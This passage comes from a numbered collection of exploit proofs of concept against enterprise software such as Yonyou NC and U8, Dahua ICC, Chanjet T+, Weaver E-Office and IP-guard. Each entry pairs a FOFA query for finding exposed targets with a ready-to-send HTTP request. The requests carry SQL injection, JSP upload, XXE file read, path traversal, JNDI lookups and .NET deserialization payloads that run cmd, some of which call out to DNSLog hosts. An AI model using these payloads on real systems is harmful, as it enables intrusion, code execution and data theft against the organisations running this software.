User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same endpoint and payload as entry 21; replace DNSLOG with your own DNSLog domain.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  ""}
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The fname field controls the destination path, so the .txt upload is written as a .jsp under the web root; verify by requesting that .jsp path and checking for the echoed string.
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then served from:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Affected versions: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Affected versions: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Affected version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

Here the traversal is in the multipart filename itself: the relative path is honoured when the upload is stored, which drops the JSP into the web root.

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

The DTD is wrapped in CDATA so the outer SOAP parser treats it as plain text; it is the service's second parse of the string argument that expands the parameter entity and fetches the external DTD.

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reachable through:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

123
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The trailing space in filename="%s.php " is part of the POC (the %s is a scanner template placeholder). The stored file is then served from a path of the form:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service path traversal (arbitrary file read)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

The POC is an encoded ../ traversal that reads /etc/passwd, so this entry is a file read, not the file upload its original title claimed.

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
  "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
  "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "FileName":"cmd",
   "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
  }
 }
 }
}

Step 2: request the following URL; the marker file being served confirms the command ran:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

The body is the classic ObjectDataProvider gadget: the AjaxPro handler deserializes the JSON with __type honoured, so it builds a Process object and calls Start on it.

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HT
TP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo": {
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
   }
  }
 }
}

Same gadget chain as entry 54, reached through a different AjaxPro handler; the ping to a DNS-log host is used as the out-of-band confirmation.

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. ZheDa Entsoft (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
